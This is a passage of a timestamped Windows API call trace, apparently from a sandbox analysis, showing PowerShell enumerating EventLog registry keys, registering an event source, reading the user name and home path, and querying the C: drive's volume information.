	[0760.284] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.284] CoTaskMemFree (pv=0x239c20) 
	[0760.284] CoTaskMemFree (pv=0x0) 
	[0760.284] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.284] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.284] CoTaskMemFree (pv=0x239c20) 
	[0760.284] CoTaskMemFree (pv=0x0) 
	[0760.284] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.284] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.297] CoTaskMemFree (pv=0x239c20) 
	[0761.297] CoTaskMemFree (pv=0x0) 
	[0761.297] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.297] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.297] CoTaskMemFree (pv=0x239c20) 
	[0761.297] CoTaskMemFree (pv=0x0) 
	[0761.297] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.297] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.297] CoTaskMemFree (pv=0x239c20) 
	[0761.297] CoTaskMemFree (pv=0x0) 
	[0761.297] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.297] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.297] CoTaskMemFree (pv=0x239c20) 
	[0761.297] CoTaskMemFree (pv=0x0) 
	[0761.297] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x354) returned 0x0
	[0761.298] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0761.298] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x37c) returned 0x0
	[0761.298] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0761.298] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x380) returned 0x0
	[0761.298] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0761.298] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x384) returned 0x0
	[0761.298] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0761.298] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x388) returned 0x0
	[0761.298] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0761.298] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x38c) returned 0x0
	[0761.299] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0761.299] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x390) returned 0x0
	[0761.299] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0761.299] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x394) returned 0x0
	[0761.299] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0761.299] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x398) returned 0x0
	[0761.299] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x39c) returned 0x0
	[0761.299] RegCloseKey (hKey=0x39c) returned 0x0
	[0761.300] RegCloseKey (hKey=0x378) returned 0x0
	[0761.300] RegCloseKey (hKey=0x398) returned 0x0
	[0761.301] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d318 | out: phkResult=0x18d318*=0x398) returned 0x0
	[0761.301] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d28c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d288, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d28c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d288*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.301] CoTaskMemFree (pv=0x0) 
	[0761.301] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.301] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.301] CoTaskMemFree (pv=0x239c20) 
	[0761.301] CoTaskMemFree (pv=0x0) 
	[0761.301] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.301] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.301] CoTaskMemFree (pv=0x239c20) 
	[0761.301] CoTaskMemFree (pv=0x0) 
	[0761.301] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.302] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.302] CoTaskMemFree (pv=0x239c20) 
	[0761.302] CoTaskMemFree (pv=0x0) 
	[0761.302] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.302] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.302] CoTaskMemFree (pv=0x239c20) 
	[0761.302] CoTaskMemFree (pv=0x0) 
	[0761.302] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.302] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.302] CoTaskMemFree (pv=0x239c20) 
	[0761.302] CoTaskMemFree (pv=0x0) 
	[0761.302] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.302] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.302] CoTaskMemFree (pv=0x239c20) 
	[0761.302] CoTaskMemFree (pv=0x0) 
	[0761.302] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.302] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.302] CoTaskMemFree (pv=0x239c20) 
	[0761.302] CoTaskMemFree (pv=0x0) 
	[0761.302] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.302] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.303] CoTaskMemFree (pv=0x239c20) 
	[0761.303] CoTaskMemFree (pv=0x0) 
	[0761.303] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0761.303] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x239c20, lpcchName=0x18d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.303] CoTaskMemFree (pv=0x239c20) 
	[0761.303] CoTaskMemFree (pv=0x0) 
	[0761.303] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x378) returned 0x0
	[0761.303] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x0) returned 0x2
	[0761.303] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x39c) returned 0x0
	[0761.303] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x0) returned 0x2
	[0761.303] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x3a0) returned 0x0
	[0761.303] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x0) returned 0x2
	[0761.303] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x3a4) returned 0x0
	[0761.304] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x0) returned 0x2
	[0761.304] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x3a8) returned 0x0
	[0761.304] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x0) returned 0x2
	[0761.304] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x3ac) returned 0x0
	[0761.304] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x0) returned 0x2
	[0761.304] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x3b0) returned 0x0
	[0761.304] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x0) returned 0x2
	[0761.304] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x3b4) returned 0x0
	[0761.304] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x0) returned 0x2
	[0761.305] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x3b8) returned 0x0
	[0761.305] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d378 | out: phkResult=0x18d378*=0x3bc) returned 0x0
	[0761.305] RegCloseKey (hKey=0x3bc) returned 0x0
	[0761.305] RegCloseKey (hKey=0x398) returned 0x0
	[0761.305] RegCloseKey (hKey=0x3b8) returned 0x0
	[0761.310] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba30008
	[0762.576] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f91590*="WSMan", lpRawData=0x2f91300) returned 1
	[0762.577] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0762.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.577] CoTaskMemFree (pv=0x1b93b9c0) 
	[0762.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0762.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0762.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0762.580] CoTaskMemAlloc (cb=0x804) returned 0x1b965a70
	[0762.580] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b965a70, nSize=0x18d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d608) returned 0x1
	[0762.580] CoTaskMemFree (pv=0x1b965a70) 
	[0762.580] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0762.580] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d648) returned 1
	[0762.580] CoTaskMemFree (pv=0x239c20) 
	[0762.581] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f96ac8*="Alias", lpRawData=0x2f96858) returned 1
	[0762.582] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0762.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.582] CoTaskMemFree (pv=0x1b93b9c0) 
	[0762.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0762.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0762.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0762.585] CoTaskMemAlloc (cb=0x804) returned 0x1b965a70
	[0762.585] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b965a70, nSize=0x18d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d608) returned 0x1
	[0762.585] CoTaskMemFree (pv=0x1b965a70) 
	[0762.585] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0762.585] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d648) returned 1
	[0762.585] CoTaskMemFree (pv=0x239c20) 
	[0762.586] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f9c0c0*="Environment", lpRawData=0x2f9be50) returned 1
	[0762.587] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0762.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.587] CoTaskMemFree (pv=0x1b93b9c0) 
	[0762.588] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0762.588] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0762.588] CoTaskMemFree (pv=0x1b93b9c0) 
	[0762.589] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0762.589] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0762.589] CoTaskMemFree (pv=0x1b93b9c0) 
	[0762.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x18d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0762.589] SetErrorMode (uMode=0x1) returned 0x1
	[0762.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x18d3c0 | out: lpFileInformation=0x18d3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0762.590] SetErrorMode (uMode=0x1) returned 0x1
	[0762.591] GetLogicalDrives () returned 0x4
	[0762.591] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18cf20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0762.592] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0762.593] SetErrorMode (uMode=0x1) returned 0x1
	[0762.602] CoTaskMemAlloc (cb=0x68) returned 0x1b941b50
	[0762.602] CoTaskMemAlloc (cb=0x68) returned 0x1b941bc0
	[0762.602] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b941b50, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x18d390, lpMaximumComponentLength=0x18d38c, lpFileSystemFlags=0x18d388, lpFileSystemNameBuffer=0x1b941bc0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18d390*=0x9c354b42, lpMaximumComponentLength=0x18d38c*=0xff, lpFileSystemFlags=0x18d388*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0762.603] CoTaskMemFree (pv=0x1b941b50) 
	[0762.603] CoTaskMemFree (pv=0x1b941bc0) 
	[0762.603] SetErrorMode (uMode=0x1) returned 0x1
	[0762.603] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0762.604] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0762.604] SetErrorMode (uMode=0x1) returned 0x1
	[0762.604] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d330 | out: lpFileInformation=0x18d330*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0762.604] SetErrorMode (uMode=0x1) returned 0x1
	[0762.604] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0762.605] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0762.605] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0762.605] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0762.605] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0762.606] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0762.606] SetErrorMode (uMode=0x1) returned 0x1
	[0762.606] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d160 | out: lpFileInformation=0x18d160*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0762.606] SetErrorMode (uMode=0x1) returned 0x1
	[0762.606] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0762.607] SetErrorMode (uMode=0x1) returned 0x1
	[0762.607] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d160 | out: lpFileInformation=0x18d160*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0762.607] SetErrorMode (uMode=0x1) returned 0x1
	[0762.607] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0762.607] SetErrorMode (uMode=0x1) returned 0x1
	[0762.607] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d200 | out: lpFileInformation=0x18d200*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0762.607] SetErrorMode (uMode=0x1) returned 0x1
	[0762.608] CoTaskMemAlloc (cb=0x804) returned 0x1b965a70
	[0762.608] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b965a70, nSize=0x18d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d608) returned 0x1
